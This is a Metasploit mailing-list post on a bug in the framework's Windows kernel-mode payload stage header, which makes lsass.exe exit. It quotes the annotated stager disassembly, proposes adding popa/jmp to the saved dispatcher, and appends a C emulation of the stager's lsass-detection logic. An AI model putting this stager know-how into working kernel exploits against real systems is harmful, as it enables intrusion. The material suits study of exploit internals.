Metasploit mailing list archives
Mistake in kernel mode payloads
From: overet at securitydate.it (Giuseppe Gottardi)
Date: Wed, 27 Feb 2008 01:27:24 +0100
Hi men, I have a little trouble with Windows kernel-mode exploitation. When a user-land payload is executed in the context of the lsass.exe process, it forces lsass.exe to exit and the system shuts down after 60 seconds due to an lsass.exe system error. I think this occurs because the payload doesn't terminate with:

    61             popa
    FF250803FE7F   jmp near [0x7ffe0308]

In fact, the stage header code supplied by Metasploit is:

    ; Preserve the calling environment
    0000003F 60             pusha
    00000040 6A30           push byte +0x30
    00000042 58             pop eax
    00000043 99             cdq
    00000044 648B18         mov ebx,[fs:eax]
    ; Check if Peb->Ldr is NULL
    00000047 39530C         cmp [ebx+0xc],edx
    0000004A 7426           jz 0x72
    ; Extract Peb->ProcessParameters->ImagePathName.Buffer
    0000004C 8B5B10         mov ebx,[ebx+0x10]
    0000004F 8B5B3C         mov ebx,[ebx+0x3c]
    ; Add 0x28 to the image path name (skip past c:\windows\system32\)
    00000052 83C328         add ebx,byte +0x28
    ; Compare the name of the executable with lass
    00000055 8B0B           mov ecx,[ebx]
    00000057 034B03         add ecx,[ebx+0x3]
    0000005A 81F96C617373   cmp ecx,0x7373616c
    ; If it doesn't match, execute the original system call dispatcher
    00000060 7510           jnz 0x72
    00000062 648B18         mov ebx,[fs:eax]
    00000065 43             inc ebx
    00000066 43             inc ebx
    00000067 43             inc ebx
    ; Check if Peb->SpareBool is 1, if it is, execute the original
    ; system call dispatcher
    00000068 803B01         cmp byte [ebx],0x1
    0000006B 7405           jz 0x72
    ; Set Peb->SpareBool to 1
    0000006D C60301         mov byte [ebx],0x1
    ; Jump into the continuation stage
    00000070 EB07           jmp short 0x79
    ; Restore the calling environment and execute the original system call
    ; dispatcher that was preserved in 0x7ffe0308
    00000072 61             popa
    00000073 FF250803FE7F   jmp near [0x7ffe0308]
    ; continuation of the stage

When, on the first execution of the stage header, the flow is directed to the stage (00000070), there's no way to restore the registers and jump to 0x7ffe0308, so lsass.exe dies.

Doing some tests I put:

    61             popa
    FF250803FE7F   jmp near [0x7ffe0308]

as "exit code" instructions, and the system could continue to live without problems. Do you have any suggestion on how to do this in Metasploit?

Regards,
oveRet
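As an added illustration (not code from the post, and not Metasploit's own stager), the following C program emulates the decision logic of the stage header quoted above. The PEB, RTL_USER_PROCESS_PARAMETERS and the saved-dispatcher slot at 0x7ffe0308 are replaced by constructed stand-in structures, and the stage and the original dispatcher are counters rather than real code; the offsets named in the comments are the ones the disassembly uses. It shows three things a reader of the post may want to verify: why `mov ecx,[ebx]` / `add ecx,[ebx+3]` on the UTF-16 image name sums to 0x7373616c ("lass") exactly for a lowercase lsass.exe and for nothing else, how Peb->SpareBool makes the stage run only once, and how many hooked system calls actually reach the original dispatcher when the stage does not end with popa / jmp [0x7ffe0308] versus when it does. The image paths and call counts are constructed sample input.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Constructed stand-ins for the structures the stage header walks. The real
 * x86 offsets the disassembly uses are: PEB+0x0c Ldr, PEB+0x10
 * ProcessParameters, RTL_USER_PROCESS_PARAMETERS+0x3c ImagePathName.Buffer,
 * PEB+3 SpareBool. Here they are plain fields. */
typedef struct {
    const uint16_t *image_path;       /* ImagePathName.Buffer, UTF-16LE */
} fake_process_parameters;

typedef struct {
    uint8_t spare_bool;               /* Peb->SpareBool */
    void *ldr;                        /* Peb->Ldr, NULL before the loader ran */
    fake_process_parameters *process_parameters;
} fake_peb;

/* Stand-in for the slot at 0x7ffe0308 where the original system call
 * dispatcher was preserved; here both targets only count how often they run. */
typedef struct {
    int original_dispatcher_calls;
    int stage_runs;
} fake_shared_data;

static void original_dispatcher(fake_shared_data *sd) { sd->original_dispatcher_calls++; }
static void continuation_stage(fake_shared_data *sd) { sd->stage_runs++; }

/* Little-endian dword at byte offset 'off': the unaligned read that
 * 'mov ecx,[ebx]' and 'add ecx,[ebx+3]' perform on the UTF-16 buffer. */
static uint32_t le32_at(const uint16_t *wbuf, size_t off) {
    const uint8_t *b = (const uint8_t *)wbuf + off;
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* The name test from the header: skip 0x28 bytes (20 wide chars, the length
 * of "c:\windows\system32\"), then add the dwords at +0 and +3.
 * "l\0s\0" (0x0073006c) + "\0a\0s" (0x73006100) = 0x7373616c = "lass". */
int image_name_is_lsass(const uint16_t *image_path) {
    const size_t skip = 0x28;
    return le32_at(image_path, skip) + le32_at(image_path, skip + 3) == 0x7373616cu;
}

/* Emulation of the stage header. restore_after_stage == 0 reproduces the flow
 * described in the post (jmp short 0x79 never comes back); 1 appends the
 * proposed "popa / jmp near [0x7ffe0308]" so the hooked call still completes. */
void stage_header(fake_peb *peb, fake_shared_data *sd, int restore_after_stage) {
    if (peb->ldr == NULL) {                                            /* jz 0x72 */
        original_dispatcher(sd);
        return;
    }
    if (!image_name_is_lsass(peb->process_parameters->image_path)) {   /* jnz 0x72 */
        original_dispatcher(sd);
        return;
    }
    if (peb->spare_bool == 1) {                                        /* jz 0x72 */
        original_dispatcher(sd);
        return;
    }
    peb->spare_bool = 1;                                               /* run once */
    continuation_stage(sd);                                            /* jmp short 0x79 */
    if (restore_after_stage)
        original_dispatcher(sd);                                       /* popa; jmp [0x7ffe0308] */
}

/* ASCII to UTF-16LE, enough to build a constructed ImagePathName. */
void ascii_to_utf16(const char *s, uint16_t *out, size_t n) {
    size_t i;
    for (i = 0; i + 1 < n && s[i]; i++)
        out[i] = (uint8_t)s[i];
    out[i] = 0;
}

/* Push 'ncalls' system calls through the hooked dispatcher for a process with
 * the given image path. Returns how many reached the original dispatcher;
 * *stage_runs receives how often the continuation stage ran. */
int simulate(const char *image_path, int ncalls, int restore_after_stage, int *stage_runs) {
    uint16_t wpath[128];
    fake_process_parameters pp = { wpath };
    fake_peb peb = { 0, (void *)1, &pp };   /* Ldr non-NULL: loader has run */
    fake_shared_data sd = { 0, 0 };
    ascii_to_utf16(image_path, wpath, sizeof wpath / sizeof wpath[0]);
    for (int i = 0; i < ncalls; i++)
        stage_header(&peb, &sd, restore_after_stage);
    *stage_runs = sd.stage_runs;
    return sd.original_dispatcher_calls;
}

int main(void) {
    int runs;
    int done = simulate("C:\\WINDOWS\\system32\\lsass.exe", 3, 0, &runs);
    printf("as posted:     %d of 3 syscalls completed, stage ran %d time(s)\n", done, runs);
    done = simulate("C:\\WINDOWS\\system32\\lsass.exe", 3, 1, &runs);
    printf("with popa/jmp: %d of 3 syscalls completed, stage ran %d time(s)\n", done, runs);
    done = simulate("C:\\WINDOWS\\system32\\svchost.exe", 3, 0, &runs);
    printf("svchost.exe:   %d of 3 syscalls completed, stage ran %d time(s)\n", done, runs);
    return 0;
}
```

In the emulation the stage simply returns, which is a simplification: in the real stager the first hooked system call that enters the stage is never dispatched at all, and it is that lost call inside lsass.exe that the post attributes the process exit to. The name check is byte-exact on a lowercase `lsass.exe` at byte offset 0x28, so an image path with a different prefix length or different case would also fall through to the original dispatcher.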
Current thread:
- Mistake in kernel mode payloads Giuseppe Gottardi (Feb 26)
- Mistake in kernel mode payloads mmiller at hick.org (Feb 26)
- Mistake in kernel mode payloads Giuseppe Gottardi (Mar 11)
- Mistake in kernel mode payloads Matt Miller (Mar 11)
- Mistake in kernel mode payloads Giuseppe Gottardi (Mar 11)
- Mistake in kernel mode payloads mmiller at hick.org (Feb 26)